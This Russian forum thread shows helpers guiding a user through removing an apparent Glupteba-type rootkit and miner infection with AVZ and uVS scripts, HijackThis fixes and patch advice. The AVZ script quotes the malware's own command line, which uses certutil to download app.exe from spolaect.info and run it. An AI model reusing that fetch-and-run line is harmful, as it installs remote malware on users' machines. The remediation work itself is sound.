Здравствуйте. Обнаружен такой вирус KRD удалить не может. Блокирует запуск некоторых программ. Грузит процессор на 100%.
Спасите.
Спасибо.
Здравствуйте. Обнаружен такой вирус KRD удалить не может. Блокирует запуск некоторых программ. Грузит процессор на 100%.
Спасите.
Спасибо.
Уважаемый(ая) [B]akaserj[/B], спасибо за обращение на наш форум!
Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe[/url]:[code]{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafеZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;
ImagePathStr, RootStr, SubRootStr, LangID: string;
AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
FinishMsg, RestoreMsg, FixMsg, CheckMsg: String;
RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;
procedure CheckAndRestoreSection(Root: String);
begin
Inc(AllRoots);
if RegKeyExistsEx('HKLM', Root) then
RegKeyResetSecurity('HKLM', Root)
else
begin
Inc(RootsRestored);
RegKeyCreate('HKLM', Root);
AddToLog(RegSectMsg + Root + RestMsg);
end;
end;
procedure CheckAndRestoreSubSection;
begin
CheckAndRestoreSection(SubRootStr);
end;
procedure RestoredMsg(Root, Param: String);
begin
AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
Inc(KeysRestored);
end;
procedure FixedMsg(Root, Param: String);
begin
AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
Inc(KeysFixed);
end;
procedure RestoreStrParam(Root, Param, Value: String);
begin
RegKeyStrParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
RestoreStrParam(Root, Param, Value);
end;
procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', Root, Param) then
begin
RegKeyIntParamWrite('HKLM', Root, Param, Value);
RestoredMsg(Root, Param);
end;
end;
procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, Param) then
begin
ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
RestoredMsg(RootStr, Param);
end;
end;
// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
if RegKeyExistsEx('HKLM', RegStr) then
begin
Inc(AllKeys);
RegKeyResetSecurity('HKLM', RegStr);
RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
FixedMsg(RegStr, 'ImagePath');
end;
end;
{ Выполнение исправление всех ключей в ветках -
'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
i : integer;
begin
if Srv = 'BITS' then
FileServiceDll := FullPathSystem32 + 'qmgr.dll'
else
FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;
CheckAndRestoreSection(RootStr);
CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');
Inc(AllKeys);
if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
else
begin
Dec(AllKeys);
if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
for i:= 0 to 999 do
begin
if i > 0 then
CCSNumber := FormatFloat('ControlSet000', i)
else
CCSNumber := 'CurrentControlSet';
ImagePathFix(CCSNumber, Srv);
end;
end;
CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
CheckAndRestoreIntParam(RootStr, 'Start', 2);
CheckAndRestoreIntParam(RootStr, 'Type', 32);
if Srv = 'BITS' then
begin
CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
end;
SubRootStr:= RootStr + '\Enum';
CheckAndRestoreSubSection;
CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);
SubRootStr := RootStr + '\Security';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
begin
RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
RestoredMsg(SubRootStr, 'Security');
end;
SubRootStr:= RootStr + '\Parameters';
CheckAndRestoreSubSection;
Inc(AllKeys);
if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
RestoredMsg(SubRootStr, 'ServiceDll');
end
else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
begin
RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
FixedMsg(SubRootStr, 'ServiceDll');
end
end;
{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFileF('c:\windows\rss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', false, '', 0 ,0);
QuarantineFile('C:\Windows\windefender.exe', '');
QuarantineFile('C:\Windows\System32\drivers\Winmon.sys', '');
QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys', '');
QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
QuarantineFile('C:\Windows\rss\csrss.exe', '');
QuarantineFile('C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe', '');
QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\mg20201223-1.exe', '');
QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\ml20201223.exe', '');
QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\ww31.exe', '');
DeleteFile('C:\Windows\windefender.exe', '32');
DeleteFile('C:\Windows\System32\drivers\Winmon.sys', '32');
DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys', '32');
DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '32');
DeleteFile('C:\Windows\rss\csrss.exe', '32');
DeleteFile('cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe /31340', '32');
DeleteFile('C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe', '32');
DeleteFile('C:\Windows\rss\csrss.exe', '');
DeleteFile('C:\Windows\windefender.exe', '');
DeleteFile('C:\Windows\system32\Drivers\winmonfs.sys', '');
DeleteFile('C:\Windows\system32\Drivers\winmonprocessmonitor.sys', '');
DeleteFile('C:\Windows\system32\Drivers\winmon.sys', '');
DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\mg20201223-1.exe', '');
DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\ml20201223.exe', '');
DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\scheduled.exe', '');
DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\wup\xarch\wup.exe', '');
DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\ww31.exe', '');
ClearLog;
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage');
if LangID = '0419' then
begin
DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
DispayNameTextWuauServ := 'Автоматическое обновление';
DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
AddToLog('Операционная система - русская');
FinishMsg := '–––– Восстановление завершено ––––';
RestoreMsg := 'Восстановлено разделов\параметров: ';
FixMsg := 'Исправлено параметров: ';
CheckMsg := 'Проверено разделов\параметров: ';
RegSectMsg := 'Раздел реестра HKLM\';
ParamMsg := 'Параметр ';
ParamValueMsg := 'Значение параметра ';
InRegSectMsg := ' в разделе реестра HKLM\';
CorrectMsg := ' исправлено на оригинальное.';
RestMsg := 'восстановлен.';
end
else
begin
DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
DispayNameTextWuauServ := 'Automatic Updates';
DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
DispayNameTextBITS := 'Background Intelligent Transfer Service';
AddToLog('Operation system - english');
FinishMsg := '–––– Restoration finished ––––';
RestoreMsg := 'Sections\parameters restored: ';
FixMsg := 'Parameters corrected: ';
CheckMsg := 'Sections\parameters checked: ';
RegSectMsg := 'Registry section HKLM\';
ParamMsg := 'Parameter ';
ParamValueMsg := 'Value of parameter ';
InRegSectMsg := ' in registry section HKLM\';
CorrectMsg := ' corrected on original.';
RestMsg := ' restored.';
end;
AddToLog('');
{ Определение папки X:\Windows\System32\ }
NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
AllRoots := 0;
AllKeys := 0;
RootsRestored := 0;
KeysRestored := 0;
KeysFixed := 0;
CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');
AddToLog('');
AddToLog(FinishMsg);
AddToLog('');
AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
AddToLog(FixMsg + IntToStr(KeysFixed));
AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
DeleteFileMask('c:\windows\rss', '*', true);
DeleteFileMask('c:\users\qwerty5\appdata\local\temp\csrss', '*', true);
DeleteSchedulerTask('csrss');
DeleteSchedulerTask('ScheduledUpdate');
DeleteDirectory('c:\windows\rss');
DeleteDirectory('c:\users\qwerty5\appdata\local\temp\csrss');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','WinterField', '32');
DeleteService('WinDefender');
DeleteService('Winmon');
DeleteService('WinmonFS');
DeleteService('WinmonProcessMonitor');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.
Выполните в AVZ скрипт:
[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.[/CODE]В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке [COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR] над над первым сообщением в теме.
Сделайте новый лог Autologger, Ok после запуска нажимайте с зажатой клавишей Shift.
Выполнил скрипт. Не чего не изменилось
Судя по логам - изменилось. Но, если раньше лечили с KRD и без толку, заражаетесь по сети с других компьютеров.
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O4 - MSConfig\startupfolder: C:^Users^qwerty5^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Matrix 2.0.lnk [backup] => C:\Program Files\Matrix 2.0\Matrix20.exe (2019/12/06) (file missing)
O4 - MSConfig\startupreg: ABBYY_MonitoringClient [command] = C:\Users\qwerty5\AppData\Roaming\ScanClient\ScanClient_Bin\monitoring_client.exe (HKCU) (2019/12/06) (file missing)[/code]
Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].
Приложите этот файл к своему следующему сообщению.
Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
Прикладываю файлы
Лечить этот компьютер можно до посинения, пока не устраните источники заражения. Судя по этой системе, она без критических обновлений ещё 2017-го года, которые закрыли уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.
[QUOTE]------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3177467]Скачать обновления[/url][/b][/color]
HotFix KB3125574 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3125574]Скачать обновления[/url][/b][/color]
HotFix KB4012212 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212]Скачать обновления[/url][/b][/color]
HotFix KB4499175 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175]Скачать обновления[/url][/b][/color]
HotFix KB4474419 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4474419]Скачать обновления[/url][/b][/color]
HotFix KB4490628 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4490628]Скачать обновления[/url][/b][/color]
HotFix KB4539602 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4539602]Скачать обновления[/url][/b][/color][/QUOTE]
Обновления автоматические, скорее всего, не заработают, т. к. служба BITS выпилена частично, но нужно пробовать установить по ссылкам вручную, в первую очередь KB4012212. Попоробуем восстановить BITS, в т.ч. этим скриптом, но по хорошему нужно пролечивать все компьютеры, и не подключать к сети до завершения.
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[code];uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
; C:\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
bp C:\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
bl 498A450754829ACC55FCA2EF4029415E 4601344
; C:\WINDOWS\WINDEFENDER.EXE
bp C:\WINDOWS\WINDEFENDER.EXE
bl 6512AE7C9F36206F6433F78296102419 1987072
zoo %SystemRoot%\RSS\CSRSS.EXE
addsgn 1A5EF69A5583348CF42B627DA804DE8E69AEF80148F91F7885B7E1365155B04DA7D7B719C9949E492B80F170431649FA7D524C5655DAB02CA0D3802FC70622F8 8 Trojan.MalPack.GS [Malwarebytes] 7
zoo %SystemRoot%\WINDEFENDER.EXE
addsgn 9252628A3E6AC1CCE02B7A4E334BDFFACE9A6C66196A8FE80FC583345791709756104849BDBB6158F0F26927471649FA7C049D75DEC433C2D1667F3E0707F900 8 Trojan.SpyBot.795 [DrWeb] 7
zoo %Sys32%\DRIVERS\WINMON.SYS
addsgn 79132211B982955C0BD4F3587B37EDFAAE75A97D65ACA138B583C5EBDB18CE0C1357C364FE6E523A1703BAB33324C2BC5D891747C9ECF02CA442E01F8706DD06 16 Win32/Rootkit.Agent.OCH [ESET-NOD32] 7
zoo %Sys32%\DRIVERS\WINMONFS.SYS
addsgn 79132211B9824A720BD4F3586037EDFAAE75A97D65AB4ED9819385BCE998970C989203233A6E5C3C3E8FB5AA424609FADEDBB83255AFB7A7ECD4A07F8706D5A3 14 VirTool:WinNT/Glupteba.B [Microsoft] 7
zoo %Sys32%\DRIVERS\WINMONPROCESSMONITOR.SYS
addsgn 79132211B982470D0BD4F3587B37EDFAAE75A97D65ACA1480583C5EBDB18CE7CA357C364FE6E523A1703BAB33324C2BC5D891747D95CF02CA44290AF8706DD06 24 Trojan.Rootkit.22045 [DrWeb] 7
zoo %SystemDrive%\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
addsgn 1A41F69A5583348CF42B25FD40CCE5C4268AFCF6FDDE95790602C43890A23FBBE214C3573E20724C2B80849FCBB26DFA7DDFE8FFF1FEB02C2D772F2E7DF9DC8D 8 Trojan.MalPack.GS [Malwarebytes] 7
chklst
delvir
deldir %SystemRoot%\RSS
delref %SystemDrive%\USERS\QWERTY5\DESKTOP\RESCUE2USB.EXE
delref %SystemDrive%\PROGRAM FILES\ASUS\AXSP\1.01.02\ATKEXCOMSVC.EXE
delref %Sys32%\DRIVERS\BSTKDRV.SYS
delref %SystemDrive%\PROGRAM FILES\ELECTIONADDRESS\COMMONS-DAEMON\PRUNSRV.EXE
delref %SystemDrive%\PROGRAM FILES\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.422\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\ABBYY REMOTE SCAN\DLL\SAPI.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.442\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.342\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.302\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\ABBYY REMOTE SCAN\DLL\USE55TROBJIMPL.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\GOOGLEUPDATEBROKER.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\GOOGLETOOLBARNOTIFIER\5.10.11023.1534\SWG.DLL
delref %SystemDrive%\PROGRA~1\ASUS\AXSP\101~1.02\ATKEXC~1.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref F:\SETUP.EXE
delref D:\RTK_NIC_DRIVER_INSTALLER.SFX.EXE
delref E:\AUTORUN.EXE
delref %SystemDrive%\DOWNLOADS\DIABLO II + D2SE + MEDIAN XL 2012 005 + ULTIMATIVE XVI + SPINOFFS\DIABLO II + D2SE + MEDIAN XL 2012 005 + ULTIMATIVE XVI + SPINOFFS\D2SE.EXE
delref %SystemDrive%\PROGRAM FILES\DXTORY SOFTWARE\DXTORY2.0\DXTORY.EXE
delref %SystemDrive%\GAMES\FARM FRENZY HEAVE HO RUS\FARMFRENZY_HEAVEHO.EXE
delref %SystemDrive%\PROGRAM FILES\ELTIMA SOFTWARE\FLASH DECOMPILER TRILLIX\FLASHDECOMPILER.EXE
delref %SystemDrive%\GAMES\LUXOR 5\LUXOR5.EXE
delref %SystemDrive%\PROGRAM FILES\LUXOR EVOLVED\LUXOR_EVOLVED.EXE
delref %SystemDrive%\USERS\QWERTY5\APPDATA\ROAMING\MAIL.RU\AGENT\BIN\MAGENT.EXE
delref %SystemDrive%\PROGRAM FILES\NEON WARS\GLLOADER.EXE
delref %SystemDrive%\GOG GAMES\PRISON ARCHITECT\PRISON ARCHITECT.EXE
delref %SystemDrive%\PROGRAM FILES\R.G. MECHANICS\SIMCITY\SIMCITY\SIMCITY.EXE
delref %SystemDrive%\PROGRAM FILES\SUPER DX-BALL\DXLOADER.EXE
delref %SystemDrive%\PROGRAM FILES\THE SEAL HUNTER\SEALHUNTER.EXE
delref %SystemDrive%\TOTALCMD\TOTALCMD.EXE
delref %SystemDrive%\USERS\QWERTY5\APPDATA\LOCAL\ALAWAR\URLRUN.EXE
delref %SystemDrive%\PROGRAM FILES\ALAWAR\СОЛДАТИКИ. ЗВЕЗДНЫЙ ДЕСАНТ\TOYDEFENSE4_SCI-FI.EXE
delref D:\BVBV\BLUESTACKS\CLIENT\BLUESTACKS.EXE
delref %SystemDrive%\PROGRAM FILES\MATRIX 2.0\MATRIX20.EXE
delref %SystemDrive%\PROGRAM FILES\MATRIX 2.0\UNINST.EXE
sfc %SystemRoot%\WINDOWS\SYSTEM32\QMGR.DLL
sfc %SystemRoot%\SYSWOW64\NETFXPERF.DLL
sfc %SystemRoot%\SYSWOW64\MSCOREE.DLL
sfc %SystemRoot%\SYSWOW64\DRPROV.DLL
apply
deltmp
czoo
restart[/code]
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.